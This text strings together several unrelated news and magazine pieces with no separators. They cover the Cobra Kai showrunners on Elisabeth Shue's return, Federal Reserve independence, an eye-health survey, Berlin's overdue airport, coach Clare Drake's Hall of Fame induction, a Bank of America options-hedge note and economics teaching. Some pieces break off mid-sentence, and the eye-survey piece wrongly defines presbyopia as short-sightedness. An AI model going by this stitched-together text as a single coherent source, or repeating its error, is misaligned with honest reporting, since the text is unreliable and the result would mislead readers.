Season 3 of the martial arts dramedy hit Netflix Friday, and along with it came the return of a Miyagi-verse favorite. Elisabeth Shue’s Ali Mills, a former love interest of both Johnny and Daniel’s, returned to the Valley to reconnect with her exes, offering an outsider’s perspective and a bit of wisdom that helped squash the lingering tension between the two senseis.
Her return was highly teased in the series’ second season, which ended with Ali sending Johnny a friend request on Facebook. But in Episode 9 of the latest run, Shue appeared at last, arriving just in time to unite the former nemeses so they can begin preparing for the bigger battle ahead: taking down John Kreese and Cobra Kai once and for all.
Here, TVLine talks to executive producers and co-showrunners Josh Heald, Jon Hurwitz and Hayden Schlossberg about how they kept Shue’s appearance mum, why Season 3 was the perfect time to bring her back, and why Ali became “the force that brings Daniel and Johnny together.”
TVLINE | How were you able to keep Elisabeth’s return such a well-guarded secret?
HEALD | We just threatened everybody! [Laughs] We discussed with all of the performers: ‘Do not post anything to social media, do not comment to your friends or loved ones. Please keep this secret.’ We had [everyone] sign pretty strict non-disclosure agreements with unspecified consequences — I have no idea what they were — but it was enough that it worked, apparently. We also just led with a big warm hug of like, ‘Hey, look around and see how special this is. Imagine how special it will be if people can discover it as a surprise.’ We operate like that with a lot of storylines on this show. We’re probably annoying to work with on some level for the marketing department because we’re always asking for the splashiest and sexiest moments to be left out of the marketing campaign entirely.
But we hark back to that age where there wasn’t an internet. You weren’t bombarded with new clips every day and first look pictures, and the barrage of material that now has become commonplace and necessary to pull in an audience in such a fragmented world. We remember going to the movies and discovering something for the first time that wasn’t in the trailer or commercial, and how magical that was. That’s harder to pull off these days, but that doesn’t mean we won’t keep trying to do that.
TVLINE | I’d imagine it was similar to the big Season 1 finale reveal?
HEALD | We did it with Kreese in the first season. Martin Kove is one of the great champions of the show, and we love that, but that whole first season, there were a lot of therapeutic phone calls of asking him to please not say anything. The moment it’s discovered, it will be an explosion, and you’ll be able to talk about it forever because people will want to. It’ll just be that much bigger. So that was the test balloon, I would say, for keeping the secret with Ali.
TVLINE | Were there ever any plans to bring her in at the very beginning? Why wait until Season 3 to re-introduce Ali?
SCHLOSSBERG | We reached out to [Shue] somewhere during Season 2, after there was a show she could see. We knew she was aware of the show, and had seen it and liked it. We had good vibes about the potential of being able to work with her when the time was right. For the fanbase that is following this story, the hardcore fans, it’s such a big moment to bring her into the story, so we really wanted it to be perfect.
We didn’t know 100 percent if we would get her because there’s all sorts of external factors that could happen. But as soon as we got the greenlight to do Season 3, it was one of the first things we discussed with Sony and our casting. We really wanted to make sure that she would be there at the end of the season, and everything worked out the way you’d hope it would when it came time to getting that whole deal done.
TVLINE | Using social media in the storyline starting in Season 2 seemed like the perfect way to tease her return.
SCHLOSSBERG | From the very beginning we loved the idea of playing her character, at first, through the eyes of Johnny looking at her life through social media. That’s something we felt a lot of people could relate to when it comes to old flames and friends from the past. We knew that Johnny was interested in her and we loved the idea of him seeing her on Facebook and seeing her life which is seemingly perfect. But then when you do meet her at the end of the season, it’s not all roses. She’s dealing with her own issues, and that was the story we pitched to her that I think she got interested in, and something that is relatable to a lot of people. The grass is always greener when you’re seeing somebody’s life on social media, and it leads to a lot of comedy, but also some real moments with them. Ultimately, of course, it was just poetic having her be the force that brings Daniel and Johnny together at the end of the season.
TVLINE | Let’s talk a bit about Ali’s effect on Johnny. I love the line when she tells him, “You have a future to find,” as if she’s championing his future. What did he learn from her and why did he need that reunion?
HURWITZ | Johnny’s life has been a mess for so long. He’s a guy who has self-sabotaged at times in his life, so to be at this place where he’s starting to connect with a woman and have the anxiety of like, ‘OK, I might get involved with someone in a serious way, [and it’s] the mother of my top karate student/surrogate son figure,’ there’s the typical jitters. He’s clearly been hung up on Ali for all these years in one way or another, so to be able to see her again and get a little taste of the past with her, but also perspective of adult life, it’s strong for him not only on the side of his love life, but also in terms of LaRusso and the approach with Daniel.
Her involvement in those scenes with Johnny and Daniel at the country club ends up causing these two guys who can’t seem to take a moment to reflect on their own roles and whatever issues they may have to perhaps realize that maybe they’re not so different after all. Even though she hasn’t seen them in so many years, just getting to spend a little bit of time with them again and be reminded of who they were in high school, she recognizes that maybe she could give them both a little bit of wisdom that can help them move forward.
TVLINE | The scene at Golf N’ Stuff when Johnny and Ali are on the bench outside: Why did you stop short of having them kiss?
HEALD | We went back and forth on that almost-kiss and we came really close to maybe saying it could’ve been a real kiss. Ultimately, we wanted to preserve that moment on the steps when she helps Johnny realize that his life makes sense with Carmen in it, and we didn’t want to feel like he needed to have a little bit of a dalliance to get there. It was more of an emotional connection [with Ali] than a physical one. That should be the takeaway there.
TVLINE | With Cobra Kai already renewed for a fourth season, is there any chance we’ll see Ali again?
HEALD | We won’t comment on what our future plans are with anybody who’s a legacy character from those movies other than to say that we have a long story left to tell. We always leave the door wide open for anybody from the Miyagi-verse to come in and out of the series.

THE FEDERAL RESERVE has heard worse. But when the president complains that it has gone “crazy” by tightening monetary policy, as Donald Trump did on October 10th, Americans fret that another norm is about to be overturned. An independent central bank is considered a pillar of a modern economy; presidents are supposed to mutter any criticisms they might have in private. But is that really for the best? Although Mr Trump’s complaints were not intended to start a high-minded debate, one is overdue.
Operational independence for central banks is relatively new. The principle grew out of work in the late 1970s and early 1980s by prominent economists working in the “rational expectations” school of economic thought, among them Finn Kydland and Edward Prescott, who were eventually awarded the Nobel prize. They considered the implications of people’s ability to look into the future and to anticipate the behaviour of self-interested…

More than half (59 per cent) do not know what the pupil does and 42 per cent have no idea of the purpose of the retina.
The research, by online optical retailer Vision Direct, found two of the most common eye conditions were also a source of confusion.
Almost 1.8 million (4 per cent) believe hyperopia, far-sightedness, was a region in ancient Egypt while a similar number (4 per cent) thought presbyopia, short-sightedness, was a blockbuster sci-fi movie.
Well over 2 million adults (4 per cent) also wrongly claimed that epidexipteryx, a bird-like dinosaur, was an eye condition.
One in 20 (4 per cent) incorrectly believe that taraxacum – the Latin name for a dandelion – was a sight-affecting ailment.
Our lack of knowledge when it comes to eye health isn’t helped by irregular eye tests.
Of the 2,000 people asked, one in seven (14 per cent) haven’t had a check-up in the last five years despite NHS guidelines recommending an eye test at least every two years.
The survey, to mark World Glaucoma Week (11-18 March) also found that many are unable to name common eye conditions.
The condition, of which around 480,000 are living with, means the optic nerve, which connects the eye to the brain, has become damaged.
While there are no symptoms to begin with, it can develop over many years affecting peripheral vision first.
If left undiagnosed and untreated, it can lead to loss of vision.
Only 41 per cent could identify astigmatism as an eye-related condition.
While just a third (36 per cent) knew that macular degeneration affected sight.
Brendan O’Brien, of Vision Direct, said “It doesn’t surprise us that many people are unable to name the most common eye conditions.
“However, in some cases, this lack of knowledge could be causing them to put off getting their eyes tested regularly.
“Getting your eyes checked is the only way to spot and manage these common conditions and getting to them earlier is vital.”
A THIRD of adults admit they are overdue an eye test, according to shocking new figures. The research found that as well as a lack of willingness to have our vision tested, our knowledge of what the eye does is also poor.![]()
A desperate plan to speed up the opening of Berlin’s infamously over-budget, behind-schedule airport calls for the use of a “prefab metal box” in lieu of the much-anticipated but incomplete main terminal. Under the plan, Berlin-Brandenburg Airport (BER) could open in 2020.
BER Director Engelbert Lütke Daldrup, the fourth successive person in charge of rescuing the project, is mulling a “soft launch” of Berlin’s never-ending airport boondoggle, Deutsche Welle reports. Described as “BER Lite,” the gambit to salvage the long-overdue air hub is expected to be presented to the company’s supervisory board Friday.
The plan would see the airport utilize the two side wings and a temporary “extension” as a workaround solution while the central terminal, intricately designed by star architect Meinhard von Gerkan, is yet to be completed. The extension, however, dubbed “Terminal 1-E,” would not be even remotely that fancy as the unfinished main terminal. It will be constructed out of “industrial prefab” and effectively be a large metal box to hold the passengers, Spiegel reported.
The plan would shift the opening to mid-2020, according to Der Spiegel. “It is no longer possible to open it by 2019,” one member of the supervisory board told the magazine.
This hope may still prove too optimistic – back in November, regulator TÜV found that outstanding issues with fire safety controls wouldn’t make launch possible till at least 2021.
Originally conceived as an elegant, modern transport hub that would replace two smaller airports located in the Berlin suburb of Tegel and the neighboring town of Schoenefeld, BER has become one of Germany’s longest-running jokes.
Construction on the airport began in 2006 as it was slated to open in 2012. Now more than six years behind schedule, the airport’s original budget of €2.5 billion ($ 2.98 billion) has since ballooned to €6.6 billion ($ 7.87 billion). The new “metal box” terminal is expected to cost “only” an additional €100 million ($ 117.5 million).
In November, the unfinished air hub’s safety systems were declared unfit for use. A German audit company revealed “faults and deficiencies” in the airport’s sprinkler systems, fire alarms and emergency lighting.
In a similar embarrassment, only 51 percent of BER’s automated doors were found to be fully functional, according to German media reports from July.
In 2015, some politicians mockingly suggested that the airport building should be demolished and a new one built from scratch. Since 2007, more than 1 million people have visited the “ghost airport,” paying about $ 15 for the privilege.

CLARE DRAKE
Canadian University Hockey’s Most Successful Coach
U of A would need more than a dozen banners to highlight Drake’s long list of accomplishments.
One of my favourites came in the 1967-68 academic year. On Nov. 25, he steered the Golden Bears football team to a 10-9 win in the Vanier Cup title game and less than three months later on Mar. 10, Drake guided his hockey team to a 5-4 win against Loyola in the University Cup final at the Montreal Forum.
The only honour missing for Drake was induction into the Hockey Hall of Fame. In a long overdue move, the 89-year-old Drake will be inducted as a builder on Monday. A builder is a slight to Drake. He has been so much to so many and the way the game is played today is because of his influence.

Unfortunately, the HHOF committee took this long to finally come around on Drake the gracious coach won’t be in Toronto for the induction ceremony on Monday. He gets around in a wheelchair these days and lives in an assisted-care facility in Edmonton.
So instead, his 36-year-old grandson, Mike Gabinet, will say a few words on Drake’s behalf. Dolly and Clare Drake have two daughters, Debbie and Jamie. Mike is Debbie’s son and he went into the family business — coaching.
He’s in his first year as head coach of the University of Nebraska at Omaha, where he patrolled the blue line and graduated with a degree in business finance in 2004.
In late September, a couple of HHOF representatives visited Drake and presented him with his HHOF blazer.
Friends from the hockey community have dropped by to see Drake for decades. As successful as he was behind the Golden Bears bench, he always has been a willing mentor to so many.
“I compare him to John Wooden,” Toronto Maple Leafs coach Mike Babcock said earlier this week, invoking the memory of the late great UCLA basketball coach. “If he was in the U.S., with his notoriety in the game, that’s what he’d be.
“He’s a champion of men, made people better. Most of his players went on to be doctors and lawyers and businessmen rather than professional athletes. In saying all that, I think he helped tons of coaches. I know he had an impact on me.
“A great, great man. I’m proud of the fact that he’s going to get the opportunity.”
Babcock, Billy Moores, Dave King, Bob Murdoch, Barry Trotz, Tom Watt, Mike Johnston, George Kingston, Ken Hitchcock, Tom Renney and the late Wayne Fleming are some of the coaches who have dotted the NHL landscape under Drake’s influence.
Drake believed in sharing his theories. He gave away so much for free. It didn’t matter that he coached against Trotz or Kingston or Watt or Fleming. He was the innovator and he still had the upper hand.
There are so many parts of Drake’s philosophy with just as much attention to what was happening off the ice as to on the ice.
On the ice he wanted his team to focus to set the tempo and to never sit back. Off the ice, he stressed to his players to have self-discipline, positive self-talk and for veterans to mentor the young players.
“It’s amazing what can be accomplished when no one cares who gets the credit,” was one of his favourite mottos, something he borrowed from Wooden.
Johnston and former NHLer Ryan Walter put together a wonderful book in 2004 called Simply the Best: Insights and Strategies from Great Hockey Coaches. Of course, there was a chapter on Drake and in it he shared his insight on the importance of team guidelines he preached to his players.
“Some of the guidelines stressed the importance of being personally responsible for your actions and maintaining a positive, enthusiastic attitude,” he said in the book. “Showing respect to all those involved in the game, developing consistency and strong habits of discipline. These characteristics were part of what we felt would become our ‘championship habits.’
“We wanted things spelled out clearly, discussed and understood, and we wanted everyone on the same page and committed to the guidelines.”
That would make a nice banner, too.

At this point, anyone following the stock market knows that price swings are non-existent.
The CBOE Volatility Index (VIX) is locked near record low levels. The benchmark S&P 500 hasn’t seen a 3% pullback in 242 days and counting, the longest such streak in history.
What does it all mean? Bank of America Merrill Lynch thinks it’s time to prepare for an inevitable shock — or as it describes it, an “overdue fragility event.”
And investors are in luck, because hedges against a sharp stock market selloff are the cheapest they’ve ever been, says BAML. The firm specifically recommends shorting one S&P 500 put contract on the benchmark falling to 2,275 by June for every two S&P 500 put contracts bet long on the benchmark to hit 2,500 by December. The index was trading at 2,570 as of 12:35 p.m. ET.
The entry point for S&P ‘fragility hedges’ in the form of put ratio calendars has never been more attractive,” BAML analyst Nikolay Angeloff wrote in a client note. “This is a trade worth considering if you disagree with the market’s implied belief that risk does not exist.”
The attractiveness of the entry point comes from the steepness of the S&P 500’s term structure, where near-dated contracts are expensive relative to those further in the future. You can see that dynamic at play in the chart below.
So why not throw some protection on? It’s cheap, and if the market sees a downturn, you’ll be glad you did.

ECONOMISTS can be a haughty bunch. But a decade of trauma has had a chastening effect. They are rethinking old ideas, asking new questions and occasionally welcoming heretics back into the fold. Change, however, has been slow to reach the university economics curriculum. Many institutions still pump students through introductory courses untainted by recent economic history or the market shortcomings it illuminates. A few plucky reformers are working to correct that: a grand and overdue idea. Overhauling the way economics is taught ought to produce students more able to understand the modern world. Even better, it should improve economics itself.
The dismal science it may be, but economics is popular on campus. It accounts for more than 10% of degrees awarded at elite universities each year, by one estimate, and many more students take an introductory class as part of their general-education requirements. Teachers of such courses aim to grab the attention of their glassy-eyed…
